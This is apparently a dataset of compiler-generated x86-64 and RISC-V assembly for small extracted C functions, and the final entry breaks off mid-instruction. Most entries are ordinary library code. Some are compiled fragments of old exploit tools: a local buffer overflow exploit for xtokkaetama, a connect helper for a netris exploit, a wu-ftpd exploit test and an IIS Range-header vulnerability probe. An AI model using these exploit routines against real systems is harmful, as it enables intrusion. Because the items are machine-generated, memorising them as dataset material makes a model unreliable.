.file "extr_elantech.c_elantech_packet_dump_aug_v3_4.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "PS/2 packet [%*ph]\n" .text .align 1 .type elantech_packet_dump, @function elantech_packet_dump: lw a4,0(a0) lw a3,4(a0) mv a1,a0 lla a2,.LC0 lw a0,.LANCHOR0 tail psmouse_printk@plt .size elantech_packet_dump, .-elantech_packet_dump .globl KERN_DEBUG .bss .align 2 .set .LANCHOR0,. + 0 .type KERN_DEBUG, @object .size KERN_DEBUG, 4 KERN_DEBUG: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_log-tree.c_fmt_output_email_subject_aug_v3_2
.file "extr_log-tree.c_fmt_output_email_subject_aug_v3_2.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string " " .LC1: .string "" .LC2: .string "Subject: [%s%s%0*d/%d] " .LC3: .string "Subject: [%s] " .LC4: .string "Subject: " .text .p2align 4 .globl fmt_output_email_subject .type fmt_output_email_subject, @function fmt_output_email_subject: .LFB24: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 movq %rdi, %r12 pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 pushq %rbx .cfi_def_cfa_offset 40 .cfi_offset 3, -40 movq %rsi, %rbx subq $8, %rsp .cfi_def_cfa_offset 48 movq (%rsi), %rbp testq %rbp, %rbp jg .L13 jne .L5 movq 8(%rsi), %rdx testq %rdx, %rdx je .L5 cmpq $0, (%rdx) jne .L14 .L5: addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 40 movq %r12, %rdi leaq .LC4(%rip), %rsi popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 jmp strbuf_addstr@PLT .p2align 4,,10 .p2align 3 .L13: .cfi_restore_state movq %rbp, %rdi movl 16(%rsi), %r13d call digits_in_number@PLT movq 8(%rbx), %rdx movq %r12, %rdi leaq .LC0(%rip), %rcx movl %eax, %r8d leaq .LC1(%rip), %rax movl %r13d, %r9d cmpq $0, (%rdx) leaq .LC2(%rip), %rsi cmove %rax, %rcx subq $8, %rsp .cfi_def_cfa_offset 56 xorl %eax, %eax pushq %rbp .cfi_def_cfa_offset 64 call strbuf_addf@PLT addq $24, %rsp .cfi_def_cfa_offset 40 popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L14: .cfi_def_cfa_offset 48 addq $8, %rsp .cfi_def_cfa_offset 40 leaq .LC3(%rip), %rsi xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 jmp strbuf_addf@PLT .cfi_endproc .LFE24: .size fmt_output_email_subject, .-fmt_output_email_subject .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_log-tree.c_fmt_output_email_subject_aug_v3_2.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string " " .align 3 .LC1: .string "" .align 3 .LC2: .string "Subject: [%s%s%0*d/%d] " .align 3 .LC3: .string "Subject: [%s] " .align 3 .LC4: .string "Subject: " .text .align 1 .globl fmt_output_email_subject .type fmt_output_email_subject, @function fmt_output_email_subject: ld a5,0(a1) addi sp,sp,-48 sd s0,32(sp) sd s1,24(sp) sd ra,40(sp) sd s2,16(sp) sd s3,8(sp) mv s0,a1 mv s1,a0 ble a5,zero,.L2 ld s2,8(a1) lla s3,.LC0 ld a4,0(s2) beq a4,zero,.L14 .L3: mv a0,a5 call digits_in_number@plt ld a6,0(s0) lw a5,16(s0) ld s0,32(sp) ld ra,40(sp) mv a4,a0 mv a3,s3 mv a2,s2 ld s3,8(sp) ld s2,16(sp) mv a0,s1 ld s1,24(sp) lla a1,.LC2 addi sp,sp,48 tail strbuf_addf@plt .L14: lla s3,.LC1 j .L3 .L2: bne a5,zero,.L4 ld a2,8(a1) beq a2,zero,.L4 ld a5,0(a2) beq a5,zero,.L4 ld s0,32(sp) ld ra,40(sp) ld s1,24(sp) ld s2,16(sp) ld s3,8(sp) lla a1,.LC3 addi sp,sp,48 tail strbuf_addf@plt .L4: ld s0,32(sp) ld ra,40(sp) ld s2,16(sp) ld s3,8(sp) mv a0,s1 ld s1,24(sp) lla a1,.LC4 addi sp,sp,48 tail strbuf_addstr@plt .size fmt_output_email_subject, .-fmt_output_email_subject .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_22984.c_main_aug_v3_3
.file "extr_22984.c_main_aug_v3_3.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "(*)xtokkaetama[v1.0b+]: local buffer overflow exploit." .align 8 .LC1: .string "(*)by: [email protected] / fakehalo.\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC2: .string "games" .LC3: .string "EXEC" .section .rodata.str1.8 .align 8 .LC4: .string "[*] in the game, hit: spacebar, \"Q\", spacebar, spacebar." .section .rodata.str1.1 .LC5: .string "[*] entering xtokkaetama..." .LC6: .string "-nickname" .LC7: .string "[!] failed to execute %s.\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r12 .cfi_def_cfa_offset 16 .cfi_offset 12, -16 movl g_aug_volatile_4478(%rip), %eax leaq .LC0(%rip), %rdi addl $1, %eax movl %eax, g_aug_volatile_4478(%rip) call puts@PLT leaq .LC1(%rip), %rdi call puts@PLT movl $16385, %edi call malloc@PLT movq %rax, %r12 testq %rax, %rax je .L13 .L2: movq exec(%rip), %rdi call strlen@PLT movl $16384, %edx movl $144, %esi movq %r12, %rdi subl %eax, %edx call memset@PLT leaq .LC2(%rip), %rdi call getgrnam@PLT movq exec(%rip), %rsi testq %rax, %rax je .L14 movl (%rax), %eax movl %eax, 28(%rsi) movl %eax, 20(%rsi) .L4: movq %r12, %rdi call strcat@PLT movl $1, %edx movq %r12, %rsi leaq .LC3(%rip), %rdi call setenv@PLT movl $16385, %edx xorl %esi, %esi movq %r12, %rdi call memset@PLT movq %r12, %rax leaq 516(%r12), %rdx .p2align 4,,10 .p2align 3 .L5: movl $3221217281, %ecx addq $4, %rax movq %rcx, -4(%rax) cmpq %rax, %rdx jne .L5 leaq .LC4(%rip), %rdi call puts@PLT movl $3, %edi call sleep@PLT leaq .LC5(%rip), %rdi call puts@PLT movq PATH(%rip), %rdi xorl %r8d, %r8d movq %r12, %rcx leaq .LC6(%rip), %rdx movq %rdi, %rsi call execlp@PLT testq %rax, %rax jne .L15 .L6: xorl %edi, %edi call exit@PLT xorl %eax, %eax popq %r12 .cfi_remember_state .cfi_def_cfa_offset 8 ret .L13: .cfi_restore_state movl $1, %edi call exit@PLT jmp .L2 .L15: movq PATH(%rip), %rsi leaq .LC7(%rip), %rdi xorl %eax, %eax call printf@PLT jmp .L6 .L14: movl $20, 28(%rsi) movl $20, 20(%rsi) jmp .L4 .cfi_endproc .LFE0: .size main, .-main .globl exec .bss .align 8 .type exec, @object .size exec, 8 exec: .zero 8 .globl PATH .align 8 .type PATH, @object .size PATH, 8 PATH: .zero 8 .globl g_aug_volatile_4478 .data .align 4 .type g_aug_volatile_4478, @object .size g_aug_volatile_4478, 4 g_aug_volatile_4478: .long 7 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_22984.c_main_aug_v3_3.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "(*)xtokkaetama[v1.0b+]: local buffer overflow exploit." .align 3 .LC1: .string "(*)by: [email protected] / fakehalo.\n" .align 3 .LC2: .string "games" .align 3 .LC3: .string "EXEC" .align 3 .LC4: .string "[*] in the game, hit: spacebar, \"Q\", spacebar, spacebar." .align 3 .LC5: .string "[*] entering xtokkaetama..." .align 3 .LC6: .string "-nickname" .align 3 .LC7: .string "[!] failed to execute %s.\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: lw a5,.LANCHOR0 addi sp,sp,-32 addiw a5,a5,1 lla a0,.LC0 sd ra,24(sp) sw a5,.LANCHOR0,a4 sd s0,16(sp) sd s1,8(sp) call puts@plt lla a0,.LC1 call puts@plt li a0,16384 addi a0,a0,1 call malloc@plt mv s0,a0 beq a0,zero,.L13 .L2: lla s1,.LANCHOR1 ld a0,0(s1) call strlen@plt li a2,16384 subw a2,a2,a0 li a1,144 mv a0,s0 call memset@plt lla a0,.LC2 call getgrnam@plt ld a1,0(s1) beq a0,zero,.L14 lw a5,0(a0) sw a5,28(a1) sw a5,20(a1) .L4: mv a0,s0 call strcat@plt li a2,1 mv a1,s0 lla a0,.LC3 call setenv@plt li a2,16384 addi a2,a2,1 li a1,0 mv a0,s0 call memset@plt li a4,1610608640 slli a4,a4,1 mv a5,s0 addi a2,s0,516 addi a4,a4,1 .L5: sd a4,0(a5) addi a5,a5,4 bne a2,a5,.L5 lla a0,.LC4 call puts@plt li a0,3 call sleep@plt lla a0,.LC5 call puts@plt ld a1,8(s1) li a4,0 mv a3,s0 lla a2,.LC6 mv a0,a1 call execlp@plt bne a0,zero,.L15 .L6: li a0,0 call exit@plt ld ra,24(sp) ld s0,16(sp) ld s1,8(sp) li a0,0 addi sp,sp,32 jr ra .L13: li a0,1 call exit@plt j .L2 .L15: ld a1,8(s1) lla a0,.LC7 call printf@plt j .L6 .L14: li a5,20 sw a5,28(a1) sw a5,20(a1) j .L4 .size main, .-main .globl exec .globl PATH .globl g_aug_volatile_4478 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_4478, @object .size g_aug_volatile_4478, 4 g_aug_volatile_4478: .word 7 .bss .align 3 .set .LANCHOR1,. + 0 .type exec, @object .size exec, 8 exec: .zero 8 .type PATH, @object .size PATH, 8 PATH: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_23196.c_sock_connect_aug_v3_3
.file "extr_23196.c_sock_connect_aug_v3_3.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "[*] attempting to connect: %s:%d.\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC1: .string "couldn't resolve hostname." .LC2: .string "netris connection failed." .section .rodata.str1.8 .align 8 .LC3: .string "[*] successfully connected: %s:%d.\n" .text .p2align 4 .globl sock_connect .type sock_connect, @function sock_connect: .LFB0: .cfi_startproc endbr64 pushq %r14 .cfi_def_cfa_offset 16 .cfi_offset 14, -16 pushq %r13 .cfi_def_cfa_offset 24 .cfi_offset 13, -24 pushq %r12 .cfi_def_cfa_offset 32 .cfi_offset 12, -32 movl %esi, %r12d pushq %rbp .cfi_def_cfa_offset 40 .cfi_offset 6, -40 movq %rdi, %rbp movzwl %r12w, %r12d pushq %rbx .cfi_def_cfa_offset 48 .cfi_offset 3, -48 subq $32, %rsp .cfi_def_cfa_offset 80 movl IPPROTO_TCP(%rip), %edx movl SOCK_STREAM(%rip), %esi movq %fs:40, %rax movq %rax, 24(%rsp) xorl %eax, %eax movl AF_INET(%rip), %edi leaq 12(%rsp), %r13 call socket@PLT movl %r12d, %edi movl %eax, %ebx movl AF_INET(%rip), %eax movl %eax, 20(%rsp) call htons@PLT movl %r12d, %edx movq %rbp, %rsi leaq .LC0(%rip), %rdi movl %eax, 16(%rsp) call printf@PLT movq %rbp, %rdi call inet_addr@PLT movl %eax, 12(%rsp) testl %eax, %eax jne .L15 .L2: movl sig_alarm(%rip), %esi movl SIGALRM(%rip), %edi call signal@PLT movl TIMEOUT(%rip), %edi call alarm@PLT movl $12, %edx movq %r13, %rsi movl %ebx, %edi call connect@PLT testq %rax, %rax jne .L16 .L4: xorl %edi, %edi call alarm@PLT movl %r12d, %edx movq %rbp, %rsi leaq .LC3(%rip), %rdi call printf@PLT movl %ebx, %eax movq 24(%rsp), %rdx subq %fs:40, %rdx jne .L17 addq $32, %rsp .cfi_remember_state .cfi_def_cfa_offset 48 popq %rbx .cfi_def_cfa_offset 40 popq %rbp .cfi_def_cfa_offset 32 popq %r12 .cfi_def_cfa_offset 24 popq %r13 .cfi_def_cfa_offset 16 popq %r14 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L15: .cfi_restore_state movq %rbp, %rdi call gethostbyname@PLT movq %rax, %r14 testq %rax, %rax je .L18 .L3: leaq 12(%rsp), %r13 movq (%r14), %rsi movl $4, %edx movq %r13, %rdi call memcpy@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L16: movl $1, %esi leaq .LC2(%rip), %rdi call printe@PLT jmp .L4 .p2align 4,,10 .p2align 3 .L18: movl $1, %esi leaq .LC1(%rip), %rdi call printe@PLT jmp .L3 .L17: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size sock_connect, .-sock_connect .globl sig_alarm .bss .align 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .globl TIMEOUT .align 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .globl SOCK_STREAM .align 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .globl SIGALRM .align 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .globl IPPROTO_TCP .align 4 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .globl AF_INET .align 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .globl g_aug_volatile_7143 .data .align 4 .type g_aug_volatile_7143, @object .size g_aug_volatile_7143, 4 g_aug_volatile_7143: .long 9 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_23196.c_sock_connect_aug_v3_3.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] attempting to connect: %s:%d.\n" .align 3 .LC1: .string "couldn't resolve hostname." .align 3 .LC2: .string "netris connection failed." .align 3 .LC3: .string "[*] successfully connected: %s:%d.\n" .text .align 1 .globl sock_connect .type sock_connect, @function sock_connect: addi sp,sp,-96 sd s0,80(sp) lla s0,.LANCHOR0 lw a2,0(s0) sd s3,56(sp) sd s4,48(sp) mv s3,a0 mv s4,a1 lw a0,8(s0) lw a1,4(s0) sd s5,40(sp) la s5,__stack_chk_guard ld a5, 0(s5) sd a5, 24(sp) li a5, 0 sd ra,88(sp) sd s1,72(sp) sd s2,64(sp) call socket@plt lw a5,8(s0) mv s1,a0 mv a0,s4 sw a5,16(sp) call htons@plt mv a5,a0 mv a2,s4 mv a1,s3 lla a0,.LC0 sw a5,12(sp) call printf@plt mv a0,s3 call inet_addr@plt sw a0,8(sp) addi s2,sp,8 bne a0,zero,.L15 .L2: lw a1,12(s0) lw a0,16(s0) call signal@plt lw a0,20(s0) call alarm@plt li a2,12 mv a1,s2 mv a0,s1 call connect@plt bne a0,zero,.L16 .L4: li a0,0 call alarm@plt mv a2,s4 mv a1,s3 lla a0,.LC3 call printf@plt slli a0,s1,48 ld a4, 24(sp) ld a5, 0(s5) xor a5, a4, a5 li a4, 0 srli a0,a0,48 bne a5,zero,.L17 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) addi sp,sp,96 jr ra .L15: mv a0,s3 call gethostbyname@plt mv s2,a0 beq a0,zero,.L18 .L3: ld a1,0(s2) addi s2,sp,8 li a2,4 mv a0,s2 call memcpy@plt j .L2 .L16: li a1,1 lla a0,.LC2 call printe@plt j .L4 .L18: li a1,1 lla a0,.LC1 call printe@plt j .L3 .L17: call __stack_chk_fail@plt .size sock_connect, .-sock_connect .globl sig_alarm .globl TIMEOUT .globl SOCK_STREAM .globl SIGALRM .globl IPPROTO_TCP .globl AF_INET .globl g_aug_volatile_7143 .data .align 2 .type g_aug_volatile_7143, @object .size g_aug_volatile_7143, 4 g_aug_volatile_7143: .word 9 .bss .align 2 .set .LANCHOR0,. + 0 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_lwan-template.c_unexpected_lexeme_aug_v3_3
.file "extr_lwan-template.c_unexpected_lexeme_aug_v3_3.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "unexpected lexeme: %s [%.*s]" .text .p2align 4 .type unexpected_lexeme, @function unexpected_lexeme: .LFB25: .cfi_startproc endbr64 movq (%rdi), %rax cmpq LEXEME_ERROR(%rip), %rax je .L2 movl 8(%rdi), %r8d movq lexeme_type_str(%rip), %rdx leaq .LC0(%rip), %rsi movl 16(%rdi), %ecx movl (%rdx,%rax,4), %edx jmp error_lexeme@PLT .p2align 4,,10 .p2align 3 .L2: xorl %eax, %eax ret .cfi_endproc .LFE25: .size unexpected_lexeme, .-unexpected_lexeme .globl lexeme_type_str .bss .align 8 .type lexeme_type_str, @object .size lexeme_type_str, 8 lexeme_type_str: .zero 8 .globl LEXEME_ERROR .align 8 .type LEXEME_ERROR, @object .size LEXEME_ERROR, 8 LEXEME_ERROR: .zero 8 .globl g_aug_volatile_7827 .data .align 4 .type g_aug_volatile_7827, @object .size g_aug_volatile_7827, 4 g_aug_volatile_7827: .long 6 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_lwan-template.c_unexpected_lexeme_aug_v3_3.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "unexpected lexeme: %s [%.*s]" .text .align 1 .type unexpected_lexeme, @function unexpected_lexeme: lla a3,.LANCHOR0 ld a4,0(a0) ld a2,0(a3) beq a4,a2,.L2 ld a2,8(a3) slli a3,a4,2 lw a4,8(a0) add a2,a2,a3 lw a2,0(a2) lw a3,16(a0) lla a1,.LC0 tail error_lexeme@plt .L2: li a0,0 ret .size unexpected_lexeme, .-unexpected_lexeme .globl lexeme_type_str .globl LEXEME_ERROR .globl g_aug_volatile_7827 .data .align 2 .type g_aug_volatile_7827, @object .size g_aug_volatile_7827, 4 g_aug_volatile_7827: .word 6 .bss .align 3 .set .LANCHOR0,. + 0 .type LEXEME_ERROR, @object .size LEXEME_ERROR, 8 LEXEME_ERROR: .zero 8 .type lexeme_type_str, @object .size lexeme_type_str, 8 lexeme_type_str: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_78.c_check_exp_aug_v3_1
.file "extr_78.c_check_exp_aug_v3_1.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "\n [+] Check exploit test ...\n" .LC1: .string "X82\r\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC2: .string " [X] After test exploit, wu-ftpd is alive.\n" .align 8 .LC3: .string " [*] Ok, This is vulnerable version.\n\n" .text .p2align 4 .globl check_exp .type check_exp, @function check_exp: .LFB1: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rsp, %rbp .cfi_def_cfa_register 6 pushq %r14 pushq %r13 pushq %r12 .cfi_offset 14, -24 .cfi_offset 13, -32 .cfi_offset 12, -40 movl %edi, %r12d pushq %rbx subq $16, %rsp .cfi_offset 3, -48 movq %fs:40, %rax movq %rax, -40(%rbp) xorl %eax, %eax movslq GET_R(%rip), %rax movq %rsp, %rcx movq %rax, %rbx addq $15, %rax movq %rax, %rdx andq $-4096, %rax subq %rax, %rcx andq $-16, %rdx cmpq %rcx, %rsp je .L3 .L14: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rcx, %rsp jne .L14 .L3: andl $4095, %edx subq %rdx, %rsp testq %rdx, %rdx jne .L15 .L4: movl stdout(%rip), %edi leaq .LC0(%rip), %rsi leaq .LC1(%rip), %r13 call fprintf@PLT movl NRL(%rip), %r14d movq %r13, %rdi call strlen@PLT movq %r13, %rsi movl %r12d, %edi movl %r14d, %ecx movl %eax, %edx call send@PLT movl SCS(%rip), %edi call sleep@PLT movl NRL(%rip), %esi movl %ebx, %edx movq %rsp, %rdi call memset@PLT leal -1(%rbx), %edx movq %rsp, %rsi movl %r12d, %edi call read@PLT movl CMD_ERROR(%rip), %esi movq %rsp, %rdi movl %eax, %ebx call strstr@PLT testq %rax, %rax jne .L16 cmpl %ebx, NRL(%rip) movl FAD(%rip), %eax jge .L17 .L1: movq -40(%rbp), %rdx subq %fs:40, %rdx jne .L18 leaq -32(%rbp), %rsp popq %rbx popq %r12 popq %r13 popq %r14 popq %rbp .cfi_remember_state .cfi_def_cfa 7, 8 ret .p2align 4,,10 .p2align 3 .L17: .cfi_restore_state movl stdout(%rip), %edi leaq .LC3(%rip), %rsi call fprintf@PLT movl SCS(%rip), %eax jmp .L1 .p2align 4,,10 .p2align 3 .L16: movl stdout(%rip), %edi leaq .LC2(%rip), %rsi call fprintf@PLT movl FAD(%rip), %eax jmp .L1 .p2align 4,,10 .p2align 3 .L15: orq $0, -8(%rsp,%rdx) jmp .L4 .L18: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size check_exp, .-check_exp .globl stdout .bss .align 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .globl SCS .align 4 .type SCS, @object .size SCS, 4 SCS: .zero 4 .globl NRL .align 4 .type NRL, @object .size NRL, 4 NRL: .zero 4 .globl GET_R .align 4 .type GET_R, @object .size GET_R, 4 GET_R: .zero 4 .globl FAD .align 4 .type FAD, @object .size FAD, 4 FAD: .zero 4 .globl CMD_ERROR .align 4 .type CMD_ERROR, @object .size CMD_ERROR, 4 CMD_ERROR: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_78.c_check_exp_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "\n [+] Check exploit test ...\n" .align 3 .LC1: .string "X82\r\n" .align 3 .LC2: .string " [X] After test exploit, wu-ftpd is alive.\n" .align 3 .LC3: .string " [*] Ok, This is vulnerable version.\n\n" .text .align 1 .globl check_exp .type check_exp, @function check_exp: addi sp,sp,-64 sd ra,56(sp) sd s0,48(sp) sd s1,40(sp) addi s0,sp,64 sd s2,32(sp) sd s3,24(sp) sd s4,16(sp) lla s1,.LANCHOR0 lw s3,0(s1) mv s2,a0 lw a0,4(s1) addi a5,s3,15 andi a5,a5,-16 la s4,__stack_chk_guard sub sp,sp,a5 lla a1,.LC0 ld a5, 0(s4) sd a5, -56(s0) li a5, 0 call fprintf@plt lla a0,.LC1 call strlen@plt lw a3,8(s1) mv a2,a0 lla a1,.LC1 mv a0,s2 call send@plt lw a0,12(s1) call sleep@plt lw a1,8(s1) mv a2,s3 mv a0,sp call memset@plt mv a1,sp mv a0,s2 addiw a2,s3,-1 call read@plt lw a1,16(s1) mv s2,a0 mv a0,sp call strstr@plt bne a0,zero,.L8 lw a5,8(s1) bge a5,s2,.L9 lw a0,20(s1) .L3: ld a4, -56(s0) ld a5, 0(s4) xor a5, a4, a5 li a4, 0 bne a5,zero,.L10 addi sp,s0,-64 ld ra,56(sp) ld s0,48(sp) ld s1,40(sp) ld s2,32(sp) ld s3,24(sp) ld s4,16(sp) addi sp,sp,64 jr ra .L9: lw a0,4(s1) lla a1,.LC3 call fprintf@plt lw a0,12(s1) j .L3 .L8: lw a0,4(s1) lla a1,.LC2 call fprintf@plt lw a0,20(s1) j .L3 .L10: call __stack_chk_fail@plt .size check_exp, .-check_exp .globl stdout .globl SCS .globl NRL .globl GET_R .globl FAD .globl CMD_ERROR .bss .align 2 .set .LANCHOR0,. + 0 .type GET_R, @object .size GET_R, 4 GET_R: .zero 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .type NRL, @object .size NRL, 4 NRL: .zero 4 .type SCS, @object .size SCS, 4 SCS: .zero 4 .type CMD_ERROR, @object .size CMD_ERROR, 4 CMD_ERROR: .zero 4 .type FAD, @object .size FAD, 4 FAD: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_36773.c_main_aug_v3_6
.file "extr_36773.c_main_aug_v3_6.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "\n Usage: %s <ip of server> \n" .LC1: .string "[*] Audit Started" .LC2: .string "Microsoft" .LC3: .string "[*] NOT IIS" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC4: .string "Requested Range Not Satisfiable" .section .rodata.str1.1 .LC5: .string "[!!] Looks VULN" .section .rodata.str1.8 .align 8 .LC6: .string "The request has an invalid header name" .section .rodata.str1.1 .LC7: .string "[*] Looks Patched" .section .rodata.str1.8 .align 8 .LC8: .string "[*] Unexpected response, cannot discern patch status" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 pushq %rbx .cfi_def_cfa_offset 40 .cfi_offset 3, -40 movq %rsi, %rbx subq $1160, %rsp .cfi_def_cfa_offset 1200 movdqa .LC9(%rip), %xmm0 movq %fs:40, %rax movq %rax, 1144(%rsp) movl g_aug_volatile_5275(%rip), %eax movb $0, 18(%rsp) movaps %xmm0, (%rsp) movdqa .LC10(%rip), %xmm0 movl $168626701, 96(%rsp) movaps %xmm0, 32(%rsp) movdqa .LC11(%rip), %xmm0 movb $0, 100(%rsp) movaps %xmm0, 48(%rsp) movdqa .LC12(%rip), %xmm0 addl $1, %eax movaps %xmm0, 64(%rsp) movdqa .LC13(%rip), %xmm0 movl %eax, g_aug_volatile_5275(%rip) movl $2573, %eax movw %ax, 16(%rsp) movaps %xmm0, 80(%rsp) cmpl $2, %edi je .L11 leaq .LC1(%rip), %rdi movq %rsp, %rbp call puts@PLT movq 8(%rbx), %rdi call connect_to_server@PLT movq %rbp, %rdi movl %eax, %r12d call strlen@PLT movq %rbp, %rsi movl %r12d, %edi leaq 112(%rsp), %rbp movl %eax, %edx call write@PLT movq %rbp, %rsi movl %r12d, %edi movl $1023, %edx call read@PLT leaq .LC2(%rip), %rsi movq %rbp, %rdi call strstr@PLT testq %rax, %rax je .L12 .L4: movq 8(%rbx), %rdi leaq 32(%rsp), %r13 call connect_to_server@PLT movq %r13, %rdi movl %eax, %r12d call strlen@PLT movq %r13, %rsi movl %r12d, %edi movl %eax, %edx call write@PLT movq %rbp, %rsi movl %r12d, %edi movl $1023, %edx call read@PLT leaq .LC4(%rip), %rsi movq %rbp, %rdi call strstr@PLT testq %rax, %rax je .L5 leaq .LC5(%rip), %rdi call puts@PLT movl $1, %edi call exit@PLT .L6: xorl %eax, %eax .L1: movq 1144(%rsp), %rdx subq %fs:40, %rdx jne .L13 addq $1160, %rsp .cfi_remember_state .cfi_def_cfa_offset 40 popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .L5: .cfi_restore_state leaq .LC6(%rip), %rsi movq %rbp, %rdi call strstr@PLT testq %rax, %rax je .L7 leaq .LC7(%rip), %rdi xorl %eax, %eax call printf@PLT jmp .L6 .L12: leaq .LC3(%rip), %rdi call puts@PLT movl $1, %edi call exit@PLT jmp .L4 .L11: movq (%rsi), %rsi leaq .LC0(%rip), %rdi xorl %eax, %eax call printf@PLT movl $1, %eax jmp .L1 .L7: leaq .LC8(%rip), %rdi xorl %eax, %eax call printf@PLT jmp .L6 .L13: call 